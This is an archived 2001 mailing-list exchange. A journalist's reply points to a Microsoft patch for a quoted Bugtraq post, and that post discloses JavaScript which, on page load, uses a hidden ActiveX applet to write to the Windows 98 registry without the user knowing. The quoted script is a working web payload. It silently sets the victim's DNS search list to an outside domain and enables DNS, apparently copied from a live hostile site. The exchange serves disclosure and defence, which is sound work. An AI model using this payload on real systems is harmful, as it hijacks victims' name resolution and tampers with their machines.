This is the basis for the Trojan.Offensive worm. The problem was originally discovered almost a year ago and was patched last November. Here's the Microsoft link: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-075.asp And my article: http://news.cnet.com/news/0-1003-200-6961705.html -R Robert Lemos Senior writer -- Security, Privacy and e-Crime ZDNet News/CNet News.com PGP key: 0x6E1966EB > -----Original Message----- > From: "Marcin Jackowski" <marcinat_private>@INTERNET@INTERLIANT@ZDNET > Sent: Tuesday, August 28, 2001 8:21 AM > To: bugtraqat_private@INTERNET@INTERLIANT@ZDNET > Subject: javascript can write anything to windows98 registry > > > <<...OLE_Obj...>> > here's code from > www.4y4y.net:88/ls.html > it can write any value to windows98 registry > solution: disable JavaScript in InternetExplorer > tested on IE5.5 > Marcin Jackowski > --------------------------------------------------------------- > <script> > document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); > function yuzi3(){ > try{ > a1=document.applets[0]; > a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); > a1.createInstance();Shl = a1.GetObject(); > a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); > try{ > Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-se > rvers.net"); > } > catch(e){} > } > catch(e){} > } > setTimeout("yuzi3()",1000); > document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); > function yuzi2(){ > try{ > a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); > a2.createInstance();Shl = > a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); > try{ > Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1"); > } > catch(e){} > } > catch(e){} > }setTimeout("yuzi2()",1000); > </script> > > > <<...OLE_Obj...>> << File: smime.p7s >>
This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 14:51:11 PDT